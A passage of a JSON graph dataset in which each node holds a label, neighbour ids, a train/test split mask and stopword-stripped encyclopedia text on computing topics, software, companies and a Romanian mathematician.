  {
    "node_id": 1749,
    "label": 0,
    "text": "Solomon_Marcus:solomon marcus solomon marcus 1 march 1925 – 17 march 2016 romanian mathematician member mathematical section romanian academy full member since 2001 emeritus professor university bucharest faculty mathematics main research fields mathematical analysis mathematical computational linguistics computer science also published numerous papers various cultural topics poetics linguistics semiotics philosophy history science education born bacău romania sima alter marcus jewish family tailors early age live dictatorships war infringements free speech free thinking well anti-semitism age 16 17 started tutoring younger pupils order help family financially graduated ferdinand high school 1944 completed studies university bucharest faculty science department mathematics 1949 continued tutoring throughout college later recounted interview endure hunger years till age 20 wore hand-me-downs older brothers obtained phd mathematics 1956 thesis monotonic functions two variables written direction miron nicolescu appointed lecturer 1955 associate professor 1964 became professor 1966 emeritus 1991 marcus contributed following areas 1 mathematical analysis set theory measure integration theory topology 2 theoretical computer science 3 linguistics 4 poetics theory literature 5 semiotics 6 cultural anthropology 7 history philosophy science 8 education marcus published 50 books romanian english french german italian spanish russian greek hungarian czech serbo-croatian 400 research articles specialized journals almost european countries united states canada south america japan india new zealand among others cited thousand authors including mathematicians computer scientists linguists literary researchers semioticians anthropologists philosophers recognised one initiators mathematical linguistics mathematical poetics member editorial board tens international scientific journals covering domains interest marcus featured people ideas theoretical computer science human face computing collection papers english followed interviews brief autobiography published 2007 words languages everywhere book meetings solomon marcus spandugino publishing house bucharest romania 2010 1500 pages edited lavinia spandonide gheorghe păun marcus ’ 85th birthday includes recollections several hundred people large variety scientific cultural fields 25 countries also contains longer autobiography died cardiac infections bucharest short stay elias hospital bucharest",
    "neighbors": [
      1890,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 1750,
    "label": 6,
    "text": "Copy_(command):copy command computing codice_1 command various operating systems command copies computer files one directory another generally command copies files one location another used make copies existing files also used combine concatenate multiple files target files destination defaults current working directory multiple source files indicated destination must directory error result command copy text mode binary mode text mode codice_1 stop reaches eof character binary mode files concatenated entirety ignoring eof characters files may copied devices example codice_3 outputs file screen console devices may copied destination file example codice_4 takes text typed console puts file stopping eof ctrl+z typed command available dec rt-11 rsx-11 os/8 intel isis-ii irmx 86 dec tops-10 tops-20 openvms metacomco tripos microware os-9 dos dr flexos ibm/toshiba 4690 os hp mpe/ix ibm os/2 microsoft windows reactos symbos dexos ms-dos available versions 1 later also available open-source ms-dos emulator dosbox dr dos 6.0 also includes implementation command equivalent unix command codice_5 cp/m command codice_6 advanced copy command called codice_7 command analogous stratus openvos codice_8 command copy letter.txt destination files may copied device files e.g codice_9 sends file printer lpt1 codice_10 would output stdout like codice_11 command note codice_12 concatenate files output codice_13 like codice_14 command also copy files different disk drives two command-line switches modify behaviour concatenating files",
    "neighbors": [
      2568,
      2573,
      6674,
      532,
      8729,
      9780,
      10818,
      2637,
      4174,
      5220,
      8301,
      1647,
      9839,
      4727,
      8831,
      9345,
      8834,
      6281,
      6797,
      2198,
      4248,
      4771,
      7847,
      8876,
      178,
      9907,
      6329,
      7356,
      10428,
      1741,
      9946,
      1253,
      4850,
      7411,
      10489,
      3323,
      6396,
      1278,
      1790,
      7939,
      5384,
      1804,
      3856,
      273,
      808,
      4398,
      7983,
      10033,
      4409,
      6459,
      5437,
      7486,
      10561,
      10564,
      8517,
      10068,
      10590,
      3426,
      6506,
      11635,
      5492,
      10101,
      3970,
      1412,
      10631,
      4001,
      9643,
      7088,
      1978,
      6075,
      960,
      9166,
      978,
      5603,
      10727,
      9709,
      3056,
      2545,
      11249,
      8692
    ],
    "mask": "None"
  },
  {
    "node_id": 1751,
    "label": 1,
    "text": "Event_store:event store event store type database optimized storage events conceptually event store events dossier policy stored idea behind dossier policy derived events events corresponding data real facts stored database instantiation objects derived events code instantiates objects memory event store database means objects instantiated stored database instead objects instantiated 'on fly memory code based events usage objects e.g shown user interface instantiated objects removed memory example event store concept database applied insurance policies pension dossiers policies dossiers instantiation object make dossier policy person partner employments etc derived instantiated memory based real world events crucial part event store database event double timeline enables event stores correct errors events entered event store database another crucial part event store database events stored allowed changed stored also erroneous events changed anymore way change better correct events instantiate new event new values using double timeline correcting event would new values original event event data corrected event different transaction date mechanism ensures reproducibility moment time even time period correction taken place also allows reproduce situations based erroneous events required one advantage event store concept handling effects back dated events events take effect previous events may even invalidate much easier regular databases handling backdated events correct previous erroneous events painful often results rolling back previous erroneous transactions objects rolling new correct transactions objects event store new event corresponding facts stored code redetermine transactions objects based new facts memory event store simplify code rolling back erroneous situations rolling new correct situations needed anymore disadvantage may code needs re-instantiate objects memory based events time service call received specific dossier policy",
    "neighbors": [
      2512,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 1752,
    "label": 3,
    "text": "Darwin_Core_Archive:darwin core archive darwin core archive dwc-a biodiversity informatics data standard makes use darwin core terms produce single self-contained dataset species occurrence checklist sampling event material sample data essentially set text csv files simple descriptor meta.xml inform others files organized format defined darwin core text guidelines preferred format publishing data gbif network darwin core standard used mobilize vast majority specimen occurrence observational records within gbif network darwin core standard originally conceived facilitate discovery retrieval integration information modern biological specimens spatio-temporal occurrence supporting evidence housed collections physical digital darwin core today broader scope aims provide stable standard reference sharing information biological diversity glossary terms darwin core provides stable semantic definitions goal maximally reusable variety contexts means darwin core may still used way historically used may also serve basis building complex exchange formats still ensuring interoperability common set terms central idea archive data files logically arranged star-like manner one core data file surrounded number ’ extensions ’ extension record ‘ extension file row ’ points record core file way zero many extension records exist single core record space-efficient method data transfer alternative including data within single table could otherwise contain many empty cells details recommended extensions found respective subsections extensively documented gbif registry catalogue available extensions sharing entire datasets instead using pageable web services like digir tapir allows much simpler efficient data transfer example retrieving 260,000 records via tapir takes nine hours issuing 1,300 http requests transfer 500 mb xml-formatted data exact dataset encoded dwc-a zipped becomes 3 mb file therefore gbif highly recommends compressing archive using zip gzip generating dwc-a archive requires stable identifiers core records extensions kind shared data therefore necessary sort local record identifiers good practice maintain – original data – identifiers stable time reused record deleted please provide globally unique identifiers instead local ones completed darwin core archive contain file containing metadata describing whole dataset ecological metadata language eml common format simple dublin core files used",
    "neighbors": [
      9669
    ],
    "mask": "Test"
  },
  {
    "node_id": 1753,
    "label": 3,
    "text": "Puyo_Puyo_(video_game):puyo puyo video game game released tokuma shoten day msx2 release name part famimaga disk series family computer disk system year msx2 fds versions sega released arcade version heavily expanded previous versions including one-player story mode two-player competitive mode main game puyo puyo played least one opponent computer human game three modes single puyo puyo double puyo puyo endless puyo puyo single mode player takes role arle nadja 16-year-old female spellcaster pleasure foiling dark prince plans dark prince wishes take world arle stands way arle must first however battle way 12 opponents facing dark prince exception rulue sent dark prince mostly want pull shenanigans rulue fell love dark prince arle beaten dark prince world saved return home main puyo games story mode consists playing puyo matches fixed sequence characters one three courses double mode two players play exactly fashion out-chaining one another player tries fill opponent grid since rules sending many garbage blocks made games short-lived matter many chains sent compile added rule offsetting puyo puyo 2 onwards lets players counter opponents attacks chains sending garbage blocks back result overflow endless mode player must continually match puyos get highest score mission mode player must complete 52 missions requiring puyos field eliminated using limited pieces english-translated version arcade original created released internationally replaces original voice work changes many characters names removes wings harpies called dark elves english version sega re-released puyo puyo mega drive december 18 1992 game gear march 19 1993 japan game gear port puyo puyo contains english version named puzlow kids version appears whenever game cartridge used north american european system pc-9801 port released compile pc-9801 march 19 1993 day game gear port released tokuma shoten re-released version puyo puyo family computer july 23 1993 added 2-player competitive mode banpresto released version super famicom title december 10 1993 port game boy developed winkysoft published banpresto released july 31 1994 original name nec released version puyo puyo pc engine cd-rom² april 22 1994 titled cri middleware released version puyo puyo fm towns december 1994 game ported amiga request amiga power magazine featured cover disk name super foul egg ported risc os acorn owain cole featured acorn user cover disk finally ported java late 1995 ported apple iigs bret victor branded puyo pop internationally first game saw release outside japan 1993 dr. robotnik mean bean machine north america europe mega drive/genesis well game gear master system europe brazil two years later released kirby avalanche kirby ghost trap europe super nes north america europe respectively mega drive version bestseller japan four months mega drive version re-released wii virtual console japan december 2 2006 arcade version released april 12 2011 two gameboy versions released first puyo puyo 1994 sequel pocket puyo puyo tsuu 1996 arcade vc release features online play",
    "neighbors": [
      321,
      8355,
      9006,
      3130,
      126
    ],
    "mask": "Test"
  },
  {
    "node_id": 1754,
    "label": 5,
    "text": "Mumble_(software):mumble software mumble voice ip voip application primarily designed use gamers similar programs teamspeak mumble uses client–server architecture allows users talk via server simple administrative interface features high sound quality low latency communication encrypted ensure user privacy mumble free open-source software cross-platform released terms new bsd license mumble server called murmur root channel hierarchical tree channels beneath users temporarily connect channels create larger virtual channels useful larger events small group users may chatting channel linked common channel users hear announcements also matches team-based first-person shooter fps games channel associated set groups access control lists control user permissions system supports many usage scenarios cost added configuration complexity mumble uses low-latency audio codec opus version 1.2.4 codec succeeds previous defaults speex celt rest mumble design allow low-latency communication meaning shorter delay something said one end heard mumble also incorporates echo cancellation reduce echo using speakers poor quality sound hardware mumble connects server via tls control channel audio travelling via udp encrypted aes ocb mode 1.2.9 mumble prefers ecdhe aes-gcm cipher suites possible providing perfect forward secrecy password authentication users supported since 1.2.0 typically eschewed favor strong authentication form public key certificates integrated overlay use games overlay shows talking linked channel version 1.0 users could upload avatars represent overlay creating personalized experience version 1.2 overlay works direct3d 9/10 opengl games windows opengl support linux mac os x. directx 11 game support later added certain games mumble modifies audio position players voices according relative position game includes giving sense direction also distance realise mumble sends player in-game position players game every audio packet mumble gather information needed two ways either reads needed information directly memory game games provide via so-called link plugin interface link plugin provides games way expose information needed positional audio including small piece source code provided mumble project several high-profile games implemented functionality including many valve source engine based games team fortress 2 guild wars 2 mobile apps available mumble mumblefy ios plumble android mumble fits existing technological social structures server fully remote controllable ice user channels well virtual server instances manipulated project provides number sample scripts illustrating abilities interface well prefabricated scripts offering features like authenticating users using existing phpbb simple machines forum database murmur server uses port 64738 tcp udp default alternative minimalist implementation mumble-server murmur called umurmur intended installation embedded devices limited resources example residential gateways running openwrt like many voip clients mumble servers rented hosted locally hosting mumble server locally requires downloading murmur included option mumble installer launching configuring server achieved via editing configuration file configuration file holds information server name user authentication audio quality restrictions port administrating server within requires user given administrator rights also done logging superuser account administrators within server add edit rooms manage users view server information",
    "neighbors": [
      4611,
      2825,
      6797,
      11413,
      1814,
      10924,
      7983,
      8758,
      7095,
      823,
      9279,
      10433,
      5959,
      5322,
      11086,
      6993,
      10451,
      2901,
      9048,
      5612
    ],
    "mask": "None"
  },
  {
    "node_id": 1755,
    "label": 7,
    "text": "Oracle_Exalogic:oracle exalogic exalogic computer appliance made oracle corporation commercially available since 2010 cluster x86-64-servers running oracle linux solaris preinstalled full trade mark oracle exalogic elastic cloud derived si prefix exa- -logic probably weblogic positioned vendor preconfigured clustered application server use cloud computing elastic computing abilities oracle corporation announced exalogic oracle openworld conference san francisco september 2010 company presented continuation oracle-engineered systems product-line started 2008 exadata preconfigured database cluster exalogic factory assembled 19-inch rack 42 rack units completed servers network equipment 4 configurations different prices depending fills rack weight full rack 1 ton 2000 lbs quarter rack weighs half much hardware component x2-2 appliance consisted group 1-unit intel xeon servers equipped two six-core 2.93 ghz processors two solid-state drives operating system swap space common storage area network set infiniband ethernet switches full rack contains 30 server nodes half rack 16 quarter rack 8 eighth rack 4 server node installed 96 gb ram four 10 gigabit ethernet interfaces double infiniband port storage area network configurations similar 40 tb raw space vendor specifications advertising content usually indicate total parameters 360 processor kernels 2.9 tb ram full rack x3-2 model announced 2012 newer processors memory since late 2013 x4-2 model commercially available yet processor cores four times large capacity solid-state drives two 64-bit operating systems run server nodes appliance oracle linux version 5.5 solaris 11 servers installed cluster configuration oracle weblogic server distributed memory cache oracle coherence run java applications machine choice hotspot jrockit management appliance available oracle enterprise manager toolset also pre-installed appliance transaction monitor tuxedo optionally supplied exalogic deployed university melbourne food drug administration fda united states amway hyundai motor group bank chile haier deutsche post dhl public authority minors affairs pama kuwait mark benioff founder salesforce.com presumes appliance principally lacks scalability end-user compared infrastructure supplied service notes exalogic approach actually rollback obsolete mainframe computer concept also commentators expressed concerns appropriateness placing word elastic name despite ability load balance obvious computing limits box limits transcended like true elastic environment criticism applies solutions designed private cloud computing particular applies emc corporation hewlett-packard products however computing environment collection servers since many exalogic machines combined limited single box capacity may considered merely building block",
    "neighbors": [
      1539,
      5384,
      9867,
      8353,
      8994,
      8871,
      1707,
      5677,
      9010,
      8627,
      9012,
      10553,
      1594,
      9665,
      6338,
      6341,
      597,
      6107,
      2269,
      1250,
      4194,
      10340,
      10090,
      1259,
      5356,
      7022,
      8434,
      1399
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1756,
    "label": 9,
    "text": "Java_Business_Integration:java business integration java business integration jbi specification developed java community process jcp approach implementing service-oriented architecture soa jcp reference jsr 208 jbi 1.0 jsr 312 jbi 2.0 jsr 312 removed jcp balloting process 17 dec 2010 submitters without accepted jbi built web services model provides pluggable architecture container hosts service producer consumer components services connect container via binding components bc hosted inside container part service engine se services model used web services description language 2.0 central message delivery mechanism normalized message router nmr delivers normalized messages via one four message exchange patterns meps taken wsdl 2.0 handle functionality deals installation deployment monitoring lifecycle concerns amongst bcs ses java management extensions jmx used jbi defines standardized packaging bcs ses allowing components portable jbi implementation without modification jbi defines standard packaging composite applications applications composed service consumers providers individual service units deployable components groups service units gathered together service assembly service assembly includes metadata wiring service units together associating service providers consumers well wiring service units external services provides simple mechanism performing composite application assembly using services following open-source software jbi based esb implementations available following esbs certified jbi/jsr 208 tck open esb petals esb addition project glassfish open-source java ee application server comes jbi runtime open esb project java ee sdk also includes jbi runtime bpel orchestration engine oracle claims fusion middleware comes jbi implementation tibco activematrix service grid provides service container framework based jsr 208 sca specifications service component architecture allowing service containers java java ee .net bpel added needed composite applications common foundation open jbi components project java.net incubator project started foster community-based development jbi components conform java business integration specification jsr 208",
    "neighbors": [
      4960,
      8929,
      2501,
      8070,
      8425,
      4107,
      6860,
      1041,
      6067
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1757,
    "label": 8,
    "text": "In-kernel_web_server:in-kernel web server in-kernel web server unlimited http server runs kernel space equivalent also called accelerator",
    "neighbors": [
      225,
      9580,
      823,
      8080,
      8976,
      4439,
      1304
    ],
    "mask": "Test"
  },
  {
    "node_id": 1758,
    "label": 4,
    "text": "Infysec:infysec infysec company provides cybersecurity services medium-sized enterprises governments across world company located chennai india focuses security technology services security consulting security training research development company founded 2010 t. vinod senthil ethical hacker along karthick vigneshwar aadhavan rajadurai gathered team security professionals started company objective providing cybersecurity services training november 2009 senthil first person chennai demonstrate wardriving assisted cyber crime department ndtv hindu news july 2013 company conducted event dubbed e-hack 24-hour hackathon company presented assocham two consecutive years cybersecurity 2016 company awarded notable startup startup story company completed 200 security projects various countries including australia maldives dubai well various governments conducted 1000+ workshops raise awareness issue cybersecurity products include capture flag cybersecurity enthusiasts test skills field cybersecurity ad-free android app called cybersec tabloid cybersecurity news updates free android app called androsentry helps monitor android devices includes theft tracker call blocker virus scanner app locker",
    "neighbors": [
      7222,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1759,
    "label": 7,
    "text": "Buildium:buildium buildium american property management software company founded 2004 headquartered boston massachusetts providing cloud-based software service real estate software property management software allows real estate professionals manage property portfolios including leasing accounting operations buildium co-founded 2004 michael monteiro dimitris georgakopoulos company bootstrapped first eight years 2012 2014 buildium raised two rounds funding totaling 20 million k1 investment management june 2016 company raised 65m sumeru equity partners february 2015 buildium acquired property management provider online marketing services property managers april 2017 buildium named leader gartner frontrunners quadrant property management software",
    "neighbors": [
      4194,
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 1760,
    "label": 9,
    "text": "IBM_Intelligent_Printer_Data_Stream:ibm intelligent printer data stream intelligent printer data stream ipds infoprint solution company systems application architecture host-to-printer data stream advanced function presentation subsystems provides attachment-independent interface controlling managing points addressable apa printers allows presentation pages containing architecturally unlimited mixture different data types including text image graphics bar code object container used variety infoprint oem print servers drive points addressable apa page printers generally printers medium high end print speed volume spectrum ipds architecture allows spooled data print job management flow bidirectionally print server print driver printer controller examples print job management controls examples spooled data ipds data streams purely used carry print information data network transport layer typically tcp/ip sna supporting hardware lans channels network controllers ipds carries data instructions print server printer structured fields printer controller processes ipds commands returns acknowledgment back print server similar ppds ipds uses binary encoded commands parameters ipds compatible ppds",
    "neighbors": [
      10280,
      4546,
      8763,
      9683
    ],
    "mask": "Test"
  },
  {
    "node_id": 1761,
    "label": 2,
    "text": "Linux_adoption:linux adoption linux adoption adoption linux computer operating systems os households nonprofit organizations businesses governments many factors resulted expanded use linux systems traditional desktop users well operators server systems including desire minimize software costs increase network security support open-source philosophical principles recent years several governments various levels enacted policies shifting state-owned computers linux proprietary software regimes august 2010 jeffrey hammond principal analyst forrester research declared linux crossed chasm mainstream adoption statement attested large number enterprises transitioned linux late-2000s recession company survey completed third quarter 2009 48 surveyed companies reported using open-source operating system linux foundation regularly releases publications regarding linux kernel linux os distributions related themes one publication linux adoption trends survey enterprise end users freely available upon registration traditionally term linux adoption refers adoption linux os made desktop computers original intended use adoption servers essentially form os adoption form personal computers still low relatively adoption android operating system high term linux adoption often overlooks operating system uses chrome os also use linux kernel almost nothing else common even name – linux – usually applied android popular variant – fact popular operating system world outside traditional web services linux powers many biggest internet properties e.g. google amazon facebook ebay twitter yahoo linux used desktop computers servers supercomputers well wide range devices linux desktop distributions usually distributed retail sale sales numbers indicate number users one downloaded file may used create many cds cd may used install operating system multiple computers hand file might used test installation erased soon due factors estimates current linux desktop often rely webpage hits computers identifying running linux use statistics criticized unreliable underestimating linux use using webpage hits measure 2008 linux accounted 1 desktop market share microsoft windows operating systems held 90 might linux seen time direct replacement windows w3counter estimated linux web browser market share 4.63 android versions 6 5 4 combined based linux kernel estimated 33.77 linux counter uses alternate method estimating adoption asking users register using mathematical model estimate total number desktop users november 2014 method estimated 73 million linux users september 2014 pornhub released usage statistics website reported 1.7 linux users unity game engine gathers user statistics showed march 2016 0.4 linux users similarly steam client tracks usage reported may 2015 around 1 linux users april 2009 aaron seigo kde indicated web-page counter methods produce linux adoption numbers far low given system extensive penetration non-north american markets especially china stated north american-based web-measurement methods produce high windows numbers ignore widespread use linux parts world estimating true worldwide desktop adoption accounting windows-distorted environment usa canada indicated least 8 world desktops run linux distributions possibly high 10–12 numbers rising quickly commentators echoed belief noting competitors expending lot effort discredit linux incongruent tiny market share may 2009 preston gralla contributing editor computerworld.com reacting net applications web hit numbers showing linux use 1 said linux never become important desktop notebook operating system reasoned upsurge linux desktop use recently seen due linux netbooks trend saw already diminishing would eroded windows 7 became available indeed linux netbooks fall wayside though whether solely responsible upsurge linux usage open question concluded desktop operating system linux n't important enough think servers top-notch likely wo n't use desktop – even though finally manage crack 1 barrier 18 years 2009 microsoft then-ceo steve ballmer indicated linux greater desktop market share mac stating recent years linux certainly increased share somewhat third dell netbook sales 2009 linux installed caitlyn martin researching retail market numbers summer 2010 also concluded traditional numbers mentioned linux desktop adoption far low reasons change operating systems linux include better system stability better malware protection low cost distributions come complete application software hardware drivers simplified updates installed software free software licensing availability application repositories access source code linux desktop distributions also offer multiple desktop workspaces greater customization free unlimited support forums operating system n't slow time environmental reasons also cited linux operating systems usually come boxes retail packaging downloaded via internet lower system specifications also mean older hardware kept use instead recycled discarded linux distributions also get security vulnerabilities patched much quickly non-free operating systems improvements linux occurring faster rate windows report economist december 2007 said investments made improve desktop linux usability since 2007 report indian bulk computer purchaser electronics corporation tamil nadu elcot started recommending linux june 2008 following testing stated elcot using suse linux ubuntu linux operating systems desktop laptop computers numbering 2,000 past two years found far superior compared operating systems notably microsoft operating system many developing nations china due widespread software piracy microsoft windows easily obtained free linux distributions gaining high level adoption hence countries essentially cost barrier obtaining proprietary operating systems users adopting linux based merit rather price january 2001 microsoft then-ceo bill gates explained attraction adopting linux internal memo released comes vs microsoft case said greatest barrier linux desktop adoption probably desktop pcs come factory a.y siu asserted 2006 people use windows simply pcs come windows pre-installed n't choose linux much lower market penetration cases users install task beyond capabilities many pc users users ’ even use windows restore cds let alone install windows scratch would install unfamiliar operating system computers techrepublic writer jack wallen expands barrier saying august 2008 linus torvalds stated june 2012 interaction students aalto university although linux originally conceived desktop system market flourished suggested key reason keeps linux getting substantial presence desktop market average desktop user want install operating system getting manufacturers sell computers linux pre-installed would missing piece fulfill vision linux desktop market added chromebooks shipping linux-based chrome os could provide key turning point transition much like android allowed linux spread mobile space september 2012 gnome developer michael meeks also indicated main reason lack adoption linux desktops lack manufacturers shipping computers pre-installed supporting siu arguments six years earlier meeks also indicated users would n't embrace desktop linux wider range applications developers wo n't create wider range applications users classic catch-22 situation opensuse survey conducted 2007 69.5 respondents said dual booted microsoft windows operating system addition linux operating system early 2007 bill whyman analyst precursor advisors noted still n't compelling alternative microsoft infrastructure desktop application support quality peripheral support end user support one time seen biggest obstacles desktop linux adoption according 2006 survey linux foundation factors seen major obstacle 56 49 33 respondents respectively time november 2006 desktop linux client survey identified foremost barrier deploying linux desktops users accustomed windows applications ported linux ca n't live without included microsoft office adobe photoshop autodesk autocad microsoft project visio intuit quickbooks creates chicken egg situation developers make programs windows due market share consumers use windows due availability said programs desktoplinux.com survey conducted 2007 72 respondents said used ways run windows applications linux 51 respondents 2006 linux foundation survey believed cross-distribution linux desktop standards top priority linux desktop community highlighting fact fragmented linux market preventing application vendors developing distributing supporting operating system may 2008 gartner predicted version control incompatibilities continue plague open-source oss associated middleware 2013 timeframe 2008 design linux applications porting windows apple applications progressed point difficult find application equivalent linux providing adequate better capabilities example application progress seen comparing main productivity suite linux openoffice.org microsoft office release openoffice.org 3.0 october 2008 ars technica assessed two past availability quality open source device drivers issues linux desktops particular areas lacking drivers included printers well wireless audio cards example early 2007 dell sell specific hardware software ubuntu 7.04 computers including printers projectors bluetooth keyboards mice tv tuners remote controls desktop modems blu-ray disc drives due incompatibilities time well legal issues 2008 linux hardware support driver issues adequately addressed september 2008 jack wallen assessment critics stated compared windows linux lacking end-user support linux traditionally seen requiring much technical expertise dell website described open source software requiring intermediate advanced knowledge use september 2007 founder ubuntu project mark shuttleworth commented would reasonable say ready mass market october 2004 chief technical officer adeptiva linux stephan february noted time linux technical software product people outside technical community able support consumers windows users able rely friends family help linux users generally use discussion boards uncomfortable consumers 2005 dominic humphries summarized difference user tech support recently critics found linux user support model using community-based forum support greatly improved 2008 jack wallen stated addressing question user support manu cornet said linux credibility also attack times ron miller linuxplanet points continuing debate total cost ownership linux gartner warning 2005 costs migration may exceed cost benefits linux gartner reiterated warning 2008 predicting 2013 majority linux deployments real software total cost ownership tco advantage operating systems however comes v. microsoft lawsuit plaintiff exhibit 2817 revealed microsoft successfully lobbied gartner changing tco model favour microsoft 1998 organizations moved linux disagreed warnings sterling ball ceo ernie ball world leading maker premium guitar strings 2003 linux adopter said total cost ownership arguments think propaganda ... cost dealing virus n't 'em ... doubt 'm cheaper operate analyst guys say whatever want sco-linux controversies sco group alleged unix source code donated ibm illegally incorporated linux threat sco might able legally assert ownership linux initially caused potential linux adopters delay move court cases bankrupted sco 2007 lost four-year court battle ownership unix copyrights sco case hinged showing linux included intellectual property misappropriated unix case failed court discovered novell sco rightful owner copyrights legal process revealed sco claims linux fraudulent sco internal source code audits showed evidence infringement rival operating system vendor green hills software called open source paradigm linux fundamentally insecure us army agree linux security problem brigadier general nick justice deputy program officer army program executive office command control communications tactical peo c3t said april 2007 2008 gartner analysts predicted mobile devices like netbooks linux could potentially break dominance microsoft windows operating system provider netbook concept focuses os-agnostic applications built web applications browsing 2008 netbook market dominated linux-powered devices changed 2009 windows xp became available option one reasons given many customers returned linux-based netbooks still expecting windows-like environment despite netbook vision web-surfing web-application device 2011 google introduced chromebook web thin client running linux-based chrome os ability use web applications remote desktop computers running windows mac os x traditional linux distribution chrome os using chrome remote desktop 2012 google samsung introduced first version chromebox small-form-factor desktop equivalent chromebook 2013 chromebooks captured 20–25 sub- 300 us laptop market note term mobile devices computing context refers cellphones tablets term include regular laptops despite fact always designed mobile android based linux open source popular mobile platform second quarter 2013 79.3 smartphones sold worldwide running android android tablets also available firefox os another open source linux-based mobile operating system discontinued nokia previously produced phones running variant linux e.g nokia n900 2013 nokia handset division bought microsoft smartphones gradually replacing kinds embedded devices still exist example portable media players oem firmware linux based community-driven fully free open-source project rockbox in-vehicle infotainment hardware usually involves kind display either built dashboard additional displays genivi alliance works linux-based open platform run ivi may interface values delivered engine control unit albeit completely separate system special variant tizen ivi different tizen smartphones several regards linux often used various single- multi-purpose computer appliances embedded systems customer-premises equipment group devices embedded graphical user interface common sense remotely operated via secure shell via web-based user interface running lightweight web server software oem firmware based linux kernel free open-source software e.g das u-boot busybox also couple community driven projects e.g openwrt smaller scale embedded network-attached storage-devices also mostly linux-driven linux became popular internet server market particularly due lamp software bundle september 2008 steve ballmer microsoft ceo claimed 60 servers run linux 40 run windows server according idc report covering q2 2013 linux 23.2 worldwide server revenue although compensate potential price disparity linux non-linux servers may 2014 w3techs estimated 67.5 top 10 million according alexa websites run form unix linux used least 57.2 websites use unix linux-based solution stacks come general advantages benefits free open-source software commonly known examples according netcraft apache http server highest market share various freely available implementations ldap servers additionally univention corporate server integrated management system based debian supports functions provided microsoft active directory administration computers running microsoft windows free routing software available linux includes bird b.a.t.m.a.n. quagga xorp whether customer-premises equipment personal computer hardware server-hardware mainline linux kernel adapted highly optimized linux kernel capable routing rates limited hardware bus throughput linux popular operating system among supercomputers due general advantages benefits free open-source software like superior performance flexibility speed lower costs november 2008 linux held 87.8 percent share world top 500 supercomputers june 2016 operating systems used world top 500 supercomputers january 2010 weiwu hu chief architect loongson family cpus institute computing technology part chinese academy sciences confirmed new dawning 6000 supercomputer use chinese-made loongson processors run linux operating system recent supercomputer organization built dawning 5000a first run 2008 used amd chips ran windows hpc server 2008 many organizations advocate linux adoption foremost linux foundation hosts sponsors key kernel developers manages linux trademark manages open source developer travel fund provides legal aid open source developers companies linux legal defense fund sponsors kernel.org also hosts patent commons project international free open source software foundation ifossf nonprofit organization based michigan usa dedicated accelerating promoting adoption foss worldwide research civil society partnership networks open invention network formed protect vendors customers patent royalty fees using oss advocates linux include gartner claimed linux-powered personal computers accounted 4 unit sales 2008 however common users install linux addition dual boot arrangement place factory-installed microsoft windows operating system",
    "neighbors": [
      2560,
      4616,
      3082,
      5644,
      5139,
      9237,
      10780,
      4637,
      8735,
      10785,
      3618,
      6180,
      9257,
      1584,
      5681,
      8242,
      9266,
      3129,
      1083,
      2111,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      2134,
      3162,
      1632,
      1121,
      2658,
      6244,
      10341,
      5222,
      10856,
      6763,
      4207,
      9851,
      5244,
      4734,
      11391,
      7812,
      8326,
      6797,
      4238,
      7821,
      10382,
      657,
      2195,
      2711,
      6808,
      9882,
      6301,
      1694,
      2723,
      5800,
      8364,
      10933,
      5822,
      5824,
      4803,
      1736,
      2761,
      2762,
      6352,
      3289,
      3802,
      4831,
      8928,
      10464,
      3300,
      2278,
      233,
      4841,
      7403,
      9455,
      7920,
      9970,
      10482,
      8439,
      2809,
      3323,
      7938,
      4360,
      5384,
      1291,
      4367,
      3857,
      1813,
      792,
      5410,
      295,
      1833,
      815,
      1328,
      7983,
      5430,
      823,
      6968,
      7992,
      318,
      3395,
      3911,
      7497,
      6988,
      10063,
      4437,
      11095,
      5978,
      3422,
      863,
      2914,
      10091,
      6508,
      7020,
      1394,
      1396,
      1400,
      8573,
      1406,
      3458,
      7555,
      900,
      8066,
      11654,
      4493,
      10127,
      11155,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      929,
      1444,
      1445,
      9637,
      935,
      4521,
      939,
      4011,
      9646,
      1456,
      1972,
      9660,
      7615,
      10687,
      9667,
      1480,
      457,
      4040,
      5067,
      8147,
      9696,
      2529,
      1506,
      6625,
      8676,
      2021,
      9190,
      11232,
      1513,
      10732,
      3055,
      5105,
      1524,
      2036,
      5620,
      8186,
      6651,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 1762,
    "label": 4,
    "text": "Tapestry_Technologies:tapestry technologies tapestry technologies small privately owned systems integration defense contractor based chambersburg pennsylvania company provides professional services united states department defense united states navy u.s. army information technology agency areas cybersecurity network systems engineering training support tapestry technologies founded 2005 jacquie sipes jim govekar cindy whitmer sipes serving company ’ ceo since inception company focused performing defense contract work category woman-owned small business recognized fortune magazine one top 20 great workplaces technology 2014 listed inc. 5000 one fastest growing private companies united states start 2015 tapestry 10 million revenue three-year sales growth 217 may 2015 company 73 employees occupying 20,000 square feet office space since october 2013 tapestry technologies served prime contractor gsa schedule 70 contract gs-35f-007ba company also performed work sub-contractor encore ii veterans administration transformation twenty-one total technology va-t4 gsm-eti contract vehicles tapestry centers business niche market within defense information systems agency providing information assurance cyber security services including certification accreditation security readiness reviews ssr security technical implementation guides stig technical training company main areas expertise cyber defense cyber training cyber integration help desk services areas expertise tapestry performed work various government task orders including writing “ security policy consolidated email system used 4.6 million dod users clients ”",
    "neighbors": [
      7979,
      4820
    ],
    "mask": "Test"
  },
  {
    "node_id": 1763,
    "label": 3,
